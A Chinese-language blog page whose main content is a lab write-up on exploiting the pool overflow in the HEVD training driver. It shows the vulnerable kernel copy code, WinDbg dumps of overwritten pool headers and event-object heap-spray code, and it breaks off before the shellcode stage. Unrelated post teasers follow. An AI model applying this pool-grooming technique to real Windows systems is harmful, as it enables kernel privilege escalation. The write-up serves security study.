關閉廣告
環境準備
Win 10 64位 主機 + win 7 32位虛擬機
Windbg:調試器
VirtualKD-3.0:雙擊調試工具
InstDrv:驅動安裝,運行工具
HEVD:一個Windows內核漏洞訓練項目,裡面幾乎涵蓋了內核可能存在的所有漏洞類型,非常適合我們熟悉理解Windows內核漏洞的原理,利用技巧等等

windows內核池簡介

想要研究windows內核漏洞,需要對windows池有一定的認識,其管理結構、分配、釋放都需要有很深的了解。這裡我不會詳細介紹池的一些知識,只推薦一些網站以供參考。
https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf
https://www.cnblogs.com/flycat-2016/p/5449738.html
下面給一個內核pool page的圖,知道這個圖,對於該池漏洞的分析,基本足夠。
Windows內核中有很多以4k為單位的pool page,每個pool page會被劃分為大小不一的pool chunk以供內核程序使用。每個pool chunk有一個pool header結構(8個字節大小),用來描述pool chunk的一些基本信息。
Pool header結構如下:
kd> dt nt!_POOL_HEADER +0x000 PreviousSize : Pos 0, 9 Bits +0x000 PoolIndex : Pos 9, 7 Bits +0x002 BlockSize : Pos 0, 9 Bits +0x002 PoolType : Pos 9, 7 Bits +0x000 Ulong1 : Uint4B +0x004 PoolTag : Uint4B +0x004 AllocatorBackTraceIndex : Uint2B +0x006 PoolTagHash : Uint2B
當我們運行代碼:
KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG);
該函數回返回一個pool chunk,返回的地址KernelBuffer = pool header + 8的空間。也就是說我們返回的空間前面有8個字節的頭部,只是我們看不到。Pool header 後面緊跟的是我們的數據,當我們的數據過程長時,就會向下覆蓋到其他chunk。
HEVD池漏洞代碼分析
漏洞代碼如下:
#define POOL_BUFFER_SIZE 504 __try { DbgPrint("[+] Allocating Pool chunk\n"); // Allocate Pool chunk KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG); if (!KernelBuffer) { // Unable to allocate Pool chunk DbgPrint("[-] Unable to allocate Pool chunk\n"); Status = STATUS_NO_MEMORY; return Status; } else { DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG)); DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool)); DbgPrint("[+] Pool Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE); DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer); } // Verify if the buffer resides in user mode ProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR)); DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer); DbgPrint("[+] UserBuffer Size: 0x%X\n", Size); DbgPrint("[+] KernelBuffer: 0x%p\n", KernelBuffer); DbgPrint("[+] KernelBuffer Size: 0x%X\n", (SIZE_T)POOL_BUFFER_SIZE);#ifdef SECURE // Secure Note: This is secure because the developer is passing a size // equal to size of the allocated Pool chunk to RtlCopyMemory()/memcpy(). // Hence, there will be no overflow RtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE);#else DbgPrint("[+] Triggering Pool Overflow\n"); // Vulnerability Note: This is a vanilla Pool Based Overflow vulnerability // because the developer is passing the user supplied value directly to // RtlCopyMemory()/memcpy() without validating if the size is greater or // equal to the size of the allocated Pool chunk RtlCopyMemory(KernelBuffer, UserBuffer, Size);#endif if (KernelBuffer) { DbgPrint("[+] Freeing Pool chunk\n"); DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG)); DbgPrint("[+] Pool Chunk: 0x%p\n", KernelBuffer); // Free the allocated Pool chunk ExFreePoolWithTag(KernelBuffer, (ULONG)POOL_TAG); KernelBuffer = NULL; } } __except (EXCEPTION_EXECUTE_HANDLER) { Status = GetExceptionCode(); DbgPrint("[-] Exception Code: 0x%X\n", Status); }
其中UserBuffer,Size的獲取方式如下:
UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
我們看上面的代碼,首先調用
ExAllocatePoolWithTag(NonPagedPool, (SIZE_T) POOL_BUFFER_SIZE, (ULONG)POOL_TAG);
申請一個固定大小的非分頁池,然後調用拷貝函數,將ring3級傳入的數據拷貝到申請的pool chunk中。
RtlCopyMemory(KernelBuffer, UserBuffer, Size);
這裡KernelBuffer是固定長度, UserBuffer和Size都是我們ring3級可控的,當我們的size大於POOL_BUFFER_SIZE時,就會造成溢出,覆蓋到下面的pool chunk。
漏洞跟蹤調試
Windbg下斷點Bp HEVD!TriggerPoolOverflow, 因為驅動是我自己編譯的,有符號文件,所以這裡我直接對函數名下斷點,如果你是直接從網上下載的驅動,那麼你需要自己找該函數對應的偏移。
當函數執行完
KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)POOL_TAG);

後,得KernelBuffer = 0x8745dd88,所以可知kernelbuffer所在的pool chunk的地址為0x8745dd88–8 = 0x8745dd80。
kd> !pool 0x8745dd88Pool page 8745dd88 region is Nonpaged pool8745d000 size: 988 previous size: 0 (Allocated) Devi (Protected)8745d988 size: 8 previous size: 988 (Free) File8745d990 size: c8 previous size: 8 (Allocated) Ntfx8745da58 size: 90 previous size: c8 (Allocated) MmCa8745dae8 size: 168 previous size: 90 (Allocated) CcSc8745dc50 size: b8 previous size: 168 (Allocated) File (Protected)8745dd08 size: 8 previous size: b8 (Free) usbp8745dd10 size: 68 previous size: 8 (Allocated) EtwR (Protected)8745dd78 size: 8 previous size: 68 (Free) XSav*8745dd80 size: 200 previous size: 8 (Allocated) *Hack Owning component : Unknown (update pooltag.txt)8745df80 size: 80 previous size: 200 (Free ) MmRl
可以看出,pool page 是以1000h即4kb為單位的, 裡面每個都是pool chunk。
下面觀察一個標記為free的pool chunk。地址為 8745d988
kd> dd 8745d9888745d988 00010131 e56c6946 04190001 7866744e8745d998 00bc0743 00000001 00000000 000000008745d9a8 00040001 00000000 8745d9b0 8745d9b08745d9b8 00000000 8745da1c 87336164 000000008745d9c8 00000000 00000000 00000000 000000008745d9d8 00000000 00000000 00000000 000000008745d9e8 00000000 00000000 00000000 002807078745d9f8 00000000 00000000 00000000 00000000kd> dt nt!_POOL_HEADER 8745d988 +0x000 PreviousSize : 0y100110001 (0x131) +0x000 PoolIndex : 0y0000000 (0) +0x002 BlockSize : 0y000000001 (0x1) +0x002 PoolType : 0y0000000 (0) +0x000 Ulong1 : 0x10131 +0x004 PoolTag : 0xe56c6946 +0x004 AllocatorBackTraceIndex : 0x6946 +0x006 PoolTagHash : 0xe56c
PreviousSize 前一個chunk大小,對應的值為0x131, 根據ListHeads數組可知, 0x131對應chunk大小為 0x131 * 8 = 0x988
BlockSize 對應本chunk大小, 對應的值為0x1, 根據ListHeads數組可知, 0x1對應chunk大小為 0x1 * 8 = 0x8
PoolType = 0 表示free。
這裡不懂也沒關係。
再看看我們申請的pool塊, 函數返回的地址為0x8745dd88,塊頭地址為0x8745dd80, 所以返回的真正存放數據的地址為PoolHeader + 8
即0x8745dd80 + 8 = 0x8745dd88
kd> dd 8745dd808745dd80 04400001 6b636148 00000000 0000001b8745dd90 083e0003 c3504c41 88129210 000001488745dda0 183c0005 6770534e 85aad038 000000008745ddb0 8745dde4 0000000a 00000001 000000018745ddc0 8745ddfc 00000018 8745deec 000000188745ddd0 8745de8c 00000008 8745debc 000000088745dde0 00000004 00000018 00000001 eb004a018745ddf0 11d49b1a 50002391 bc597704 00000000kd> dt nt!_POOL_HEADER 8745dd80 +0x000 PreviousSize : 0y000000001 (0x1) +0x000 PoolIndex : 0y0000000 (0) +0x002 BlockSize : 0y001000000 (0x40) +0x002 PoolType : 0y0000010 (0x2) +0x000 Ulong1 : 0x4400001 +0x004 PoolTag : 0x6b636148 +0x004 AllocatorBackTraceIndex : 0x6148 +0x006 PoolTagHash : 0x6b63
PoolType為0x2, 表示Allocated, 空間被使用, 由dd 8745dd80可知,
0x8745dd88 開始後的數據並不是全0, 也就是ExAllocatePoolWithTag申請空間時,並不會做初始化工作。
//memset(UserModeBuffer, 0x41, 504);RtlCopyMemory(KernelBuffer, UserBuffer, Size);
當執行RtlCopyMemory後,0x8745dd88開始的數據將會被A覆蓋
kd> dd 8745dd80 L1008745dd80 04400001 6b636148 41414141 414141418745dd90 41414141 41414141 41414141 414141418745dda0 41414141 41414141 41414141 414141418745ddb0 41414141 41414141 41414141 414141418745ddc0 41414141 41414141 41414141 414141418745ddd0 41414141 41414141 41414141 414141418745dde0 41414141 41414141 41414141 414141418745ddf0 41414141 41414141 41414141 414141418745de00 41414141 41414141 41414141 414141418745de10 41414141 41414141 41414141 414141418745de20 41414141 41414141 41414141 414141418745de30 41414141 41414141 41414141 414141418745de40 41414141 41414141 41414141 414141418745de50 41414141 41414141 41414141 414141418745de60 41414141 41414141 41414141 414141418745de70 41414141 41414141 41414141 414141418745de80 41414141 41414141 41414141 414141418745de90 41414141 41414141 41414141 414141418745dea0 41414141 41414141 41414141 414141418745deb0 41414141 41414141 41414141 414141418745dec0 41414141 41414141 41414141 414141418745ded0 41414141 41414141 41414141 414141418745dee0 41414141 41414141 41414141 414141418745def0 41414141 41414141 41414141 414141418745df00 41414141 41414141 41414141 414141418745df10 41414141 41414141 41414141 414141418745df20 41414141 41414141 41414141 414141418745df30 41414141 41414141 41414141 414141418745df40 41414141 41414141 41414141 414141418745df50 41414141 41414141 41414141 414141418745df60 41414141 41414141 41414141 414141418745df70 41414141 41414141 41414141 414141418745df80 08100040 6c526d4d 00000000 874873988745df90 00000000 8745df94 8745df94 000000048745dfa0 00000005 ffffffff 00000000 000000008745dfb0 00000000 8745dfb4 8745dfb4 000000008745dfc0 00000000 00000000 00000000 8745dfcc8745dfd0 8745dfcc 00000004 00000465 87ef35e88745dfe0 88097ae0 00000000 00000000 000000008745dff0 00000000 00000000 00000000 87f323808745e000 01010129 00000000 00055400 0003023f8745e010 00000000 00055420 00030240 00000000---------------------------------------------------------char UserModeBuffer[512 + 8] = { 0x41 };memset(UserModeBuffer, 0x41, 512);memset(UserModeBuffer + 512, 0x42, 8);UserModeBufferSize = 512 + 8;
如果UserModeBuffer空間大於ExAllocatePoolWithTag所申請的空間, 在執行RtlCopyMemory(KernelBuffer, UserBuffer, Size);
時就會覆蓋下一個pool chunk的相關信息
下一個chunk被覆蓋前後的數據(由於重新運行了程序,所有地址和上面不一樣了)
kd> dd 8818d6108818d610 085f0040 70627375 88335fb8 000000008818d620 00000000 00000000 00000000 000000008818d630 43787254 00000000 00000000 000000c88818d640 077415ad 00000000 00000000 0000020a8818d650 0000000f 000002f0 000002cc 000000038818d660 00000001 00000000 6f6d7455 863780288818d670 00000000 00000000 00000000 000000008818d680 00000000 00000000 00000000 00000000kd> dt nt!_POOL_HEADER 8818d610 +0x000 PreviousSize : 0y001000000 (0x40) +0x000 PoolIndex : 0y0000000 (0) +0x002 BlockSize : 0y001011111 (0x5f) +0x002 PoolType : 0y0000100 (0x4) +0x000 Ulong1 : 0x85f0040 +0x004 PoolTag : 0x70627375 +0x004 AllocatorBackTraceIndex : 0x7375 +0x006 PoolTagHash : 0x706
覆蓋後
kd> dt nt!_POOL_HEADER 8818d610 +0x000 PreviousSize : 0y101000001 (0x141) +0x000 PoolIndex : 0y0100000 (0x20) +0x002 BlockSize : 0y101000001 (0x141) +0x002 PoolType : 0y0100000 (0x20) +0x000 Ulong1 : 0x41414141 +0x004 PoolTag : 0x41414141 +0x004 AllocatorBackTraceIndex : 0x4141 +0x006 PoolTagHash : 0x4141kd> dd 8818d6108818d610 41414141 41414141 42424242 424242428818d620 00000000 00000000 00000000 000000008818d630 43787254 00000000 00000000 000000c88818d640 077415ad 00000000 00000000 0000020a8818d650 0000000f 000002f0 000002cc 000000038818d660 00000001 00000000 6f6d7455 863780288818d670 00000000 00000000 00000000 000000008818d680 00000000 00000000 00000000 00000000
再繼續運行的話,系統藍屏
漏洞利用
內核池類似於windows中的堆,用來動態分配內存,因為有漏洞的用戶緩衝區分配在非分頁池上,所以我們需要一些技術來控制修改非分頁池。這種技術就是堆噴技術,如果之前你沒接觸內核堆噴,沒關係,往下看就行了。
Windows 提供了一種Event對象, 該對象存儲在非分頁池中,可以使用CreateEventAPI 來創建:
HANDLE WINAPI CreateEvent(_In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,_In_ BOOL bManualReset,_In_ BOOL bInitialState,_In_opt_ LPCTSTR lpName);
在這裡我們需要用這個API創建兩個足夠大的Event對象數組,然後通過使用CloseHandleAPI 釋放某些Event 對象,從而在分配的池塊中造成空隙,經合併形成更大的空閒塊:
BOOL WINAPI CloseHandle(_In_ HANDLE hObject);
下面我們具體跟蹤觀察下,就明白了。
//heap spray HANDLE spray_event1[10000] = { NULL }; HANDLE spray_event2[5000] = { NULL }; for (int i = 0; i < 10000; i++) { spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL); } for (int j = 0; j < 5000; j++) { spray_event2[j] = CreateEventA(NULL, FALSE, FALSE, NULL); } for (int i = 5000-1; i >= 4989; i--) { printf("%x\n", spray_event2[i]);}
如上構造堆噴代碼,最後把後面的事件句柄打印出來,方便我們觀察池結構。
kd> !handle eafcPROCESS 85a54030 SessionId: 1 Cid: 0a0c Peb: 7ffdf000 ParentCid: 05e8 DirBase: bebcd580 ObjectTable: a6088008 HandleCount: 15010. Image: MyExploitForHevd.exeHandle table at a6088008 with 15010 entries in useeafc: Object: 85b33930 GrantedAccess: 001f0003 Entry: a5ada5f8Object: 85b33930 Type: (85763418) Event ObjectHeader: 85b33918 (new version) HandleCount: 1 PointerCount: 1kd> !pool 85b33930Pool page 85b33930 region is Nonpaged pool85b33000 size: 40 previous size: 0 (Allocated) Even (Protected)85b33040 size: 290 previous size: 40 (Free) ...@85b332d0 size: 40 previous size: 290 (Allocated) SeTl85b33310 size: 2f8 previous size: 40 (Allocated) usbp85b33608 size: 2f8 previous size: 2f8 (Allocated) usbp*85b33900 size: 40 previous size: 2f8 (Allocated) *Even (Protected) Pooltag Even : Event objects85b33940 size: 40 previous size: 40 (Allocated) Even (Protected)85b33980 size: 40 previous size: 40 (Allocated) Even (Protected)85b339c0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33a00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33a40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33a80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33ac0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33b00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33b40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33b80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33bc0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33c00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33c40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33c80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33cc0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33d00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33d40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33d80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33dc0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33e00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33e40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33e80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33ec0 size: 40 previous size: 40 (Allocated) Even (Protected)85b33f00 size: 40 previous size: 40 (Allocated) Even (Protected)85b33f40 size: 40 previous size: 40 (Allocated) Even (Protected)85b33f80 size: 40 previous size: 40 (Allocated) Even (Protected)85b33fc0 size: 40 previous size: 40 (Allocated) Even (Protected)
如上觀察,Even占據着大量的pool page,每個大小0x40。
我們申請的池大小為504,再加上8個字節的pool header, 504+8=512=0x200=0x40*8, 剛好8個event chunk的大小,這也是我們選擇event內核對象的原因。
下面我們看看如何製造堆噴縫隙:
//製造堆噴區空洞, 目的使我們的數據分配到空洞上; for (int i = 0; i < 5000; i = i + 16) { for (int j = 0; j < 8; j++) { //一個event對象大小0x40, 0x200的空間需要8個event對象; CloseHandle(spray_event2[i + j]); }}
運行代碼,我們再次看看pool page的結構:
kd> !pool 85b32d70Pool page 85b32d70 region is Nonpaged pool85b32000 size: 2f8 previous size: 0 (Allocated) usbp85b322f8 size: 510 previous size: 2f8 (Free) ."..85b32808 size: 2f8 previous size: 510 (Allocated) usbp85b32b00 size: 40 previous size: 2f8 (Free ) Even (Protected)85b32b40 size: 40 previous size: 40 (Free ) Even (Protected)85b32b80 size: 40 previous size: 40 (Free ) Even (Protected)85b32bc0 size: 40 previous size: 40 (Free ) Even (Protected)85b32c00 size: 40 previous size: 40 (Free ) Even (Protected)85b32c40 size: 40 previous size: 40 (Free ) Even (Protected)85b32c80 size: 40 previous size: 40 (Free ) Even (Protected)85b32cc0 size: 40 previous size: 40 (Free) Even85b32d00 size: 40 previous size: 40 (Allocated) Even (Protected)*85b32d40 size: 40 previous size: 40 (Allocated) *Even (Protected) Pooltag Even : Event objects85b32d80 size: 40 previous size: 40 (Allocated) Even (Protected)85b32dc0 size: 40 previous size: 40 (Allocated) Even (Protected)85b32e00 size: 40 previous size: 40 (Allocated) Even (Protected)85b32e40 size: 40 previous size: 40 (Allocated) Even (Protected)85b32e80 size: 40 previous size: 40 (Allocated) Even (Protected)85b32ec0 size: 40 previous size: 40 (Allocated) Even (Protected)85b32f00 size: 100 previous size: 40 (Free) Even
如上所示,在我們調用CloseHandle關閉大量事件句柄後,內核池頁上出現了大量的空洞。大小為0x40*8=0x200,當我們再次申請0x200大小的空間時,就有很大的概率落在這些空洞上。
此次申請的KernelBuffer = 0x85b108c8,我們看下其位置
kd> !pool 0x85b108c8Pool page 85b108c8 region is Nonpaged pool85b10000 size: 40 previous size: 0 (Allocated) Even (Protected)85b10040 size: 40 previous size: 40 (Allocated) Even (Protected)85b10080 size: 40 previous size: 40 (Allocated) Even (Protected)85b100c0 size: 200 previous size: 40 (Free) Even(8個一組的縫隙)85b102c0 size: 40 previous size: 200 (Allocated) Even (Protected)85b10300 size: 40 previous size: 40 (Allocated) Even (Protected)85b10340 size: 40 previous size: 40 (Allocated) Even (Protected)85b10380 size: 40 previous size: 40 (Allocated) Even (Protected)85b103c0 size: 40 previous size: 40 (Allocated) Even (Protected)85b10400 size: 40 previous size: 40 (Allocated) Even (Protected)85b10440 size: 40 previous size: 40 (Allocated) Even (Protected)85b10480 size: 40 previous size: 40 (Allocated) Even (Protected)85b104c0 size: 200 previous size: 40 (Free) Even(8個一組的縫隙)85b106c0 size: 40 previous size: 200 (Allocated) Even (Protected)85b10700 size: 40 previous size: 40 (Allocated) Even (Protected)85b10740 size: 40 previous size: 40 (Allocated) Even (Protected)85b10780 size: 40 previous size: 40 (Allocated) Even (Protected)85b107c0 size: 40 previous size: 40 (Allocated) Even (Protected)85b10800 size: 40 previous size: 40 (Allocated) Even (Protected)85b10840 size: 40 previous size: 40 (Allocated) Even (Protected)85b10880 size: 40 previous size: 40 (Allocated) Even (Protected)*85b108c0 size: 200 previous size: 40 (Allocated) *Hack Owning component : Unknown (update pooltag.txt)85b10ac0 size: 40 previous size: 200 (Allocated) Even (Protected)85b10b00 size: 40 previous size: 40 (Allocated) Even (Protected)85b10b40 size: 40 previous size: 40 (Allocated) Even (Protected)85b10b80 size: 40 previous size: 40 (Allocated) Even (Protected)85b10bc0 size: 40 previous size: 40 (Allocated) Even (Protected)85b10c00 size: 40 previous size: 40 (Allocated) Even (Protected)85b10c40 size: 40 previous size: 40 (Allocated) Even (Protected)85b10c80 size: 40 previous size: 40 (Allocated) Even (Protected)85b10cc0 size: c0 previous size: 40 (Free) Even85b10d80 size: 140 previous size: c0 (Allocated) Io Process: 873d947885b10ec0 size: 40 previous size: 140 (Allocated) Even (Protected)85b10f00 size: 40 previous size: 40 (Allocated) Even (Protected)85b10f40 size: 40 previous size: 40 (Allocated) Even (Protected)85b10f80 size: 40 previous size: 40 (Allocated) Even (Protected)85b10fc0 size: 40 previous size: 40 (Allocated) Even (Protected)
可知其剛好落在了構造的堆噴空隙中。
所以我們向下覆蓋數據時,會覆蓋event對象的一些結構,我們接下來看下如果通過event對象來達到控制程序流程,執行我們的shellcode。
Windows系統的各種資源以對象(Object)的形式來組織,例如File Object, Driver Object, Device Object等等,但實際上這些所謂的「對象」在系統的對象管理器(Object Manager)看來只是完整對象的一個部分——對象實體(Object Body)
一個內核對象有三部分組成,
首先是
kd> dt nt!_OBJECT_HEADER_QUOTA_INFO +0x000 PagedPoolCharge : Uint4B +0x004 NonPagedPoolCharge : Uint4B +0x008 SecurityDescriptorCharge : Uint4B +0x00c SecurityDescriptorQuotaBlock : Ptr32 Void

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

第292期

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

拒絕內卷

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

背景

摩訶草,又名Hangover、Patchwork、白象等,奇安信內部跟蹤編號為APT-Q-36,最早由國外安全廠商Norman披露並命名為Hangover,2016年8月其他廠商後續披露了摩訶草組織的詳細報告。國內其他安全廠商通常也稱其為「白象」。該APT組織被廣泛認為來自南亞地區某國,其最早攻擊活動可以追溯到2009年11月,從2015年開始變得更加活躍。該組織主要針對Windows系統進行攻擊,同時也會針對Android、Mac OS系統進行攻擊。其攻擊活動中使用了大量漏洞,其中至少包括一次 0day 漏洞利用攻擊。

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

當下科技板塊如何布局?

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top


(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

黨的紀律

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

展開

var __INLINE_SCRIPT__=function(){"use strict";var e=function(e,a){function t(e,a){var t=e.match(new RegExp(a+"\\s*=\\s*[\"']?([^\"'\\s>]+)[\"']?"));return t&&t[1]}e=a?window.__emojiFormat(function(e){var a;e=e.split(/(]*>)(.*?)()/);for(var i=0;ii.offsetHeight+1?e.style.display="block":e.style.display="none"}),300))};if(!window.__second_open__){var a="祝,大飛機小朋友、大朋友們,節日快樂[嘿哈]\x0a\x0a(特別支持:上飛院、客服公司、試飛中心、上航公司,記者:倩楠、甜甜、李冠、徐倩,責編 · 視頻:鈺宸)";e(a,!0),window.__setDesc=e}return e}();
(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

大數據文摘轉載自數據派THU

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top

大數據文摘轉載自學術頭條

(繼續閱讀...)

鑽石舞台 發表在 痞客邦 留言(0) 人氣()

▲top
«1...103311033210333 1033410335...25341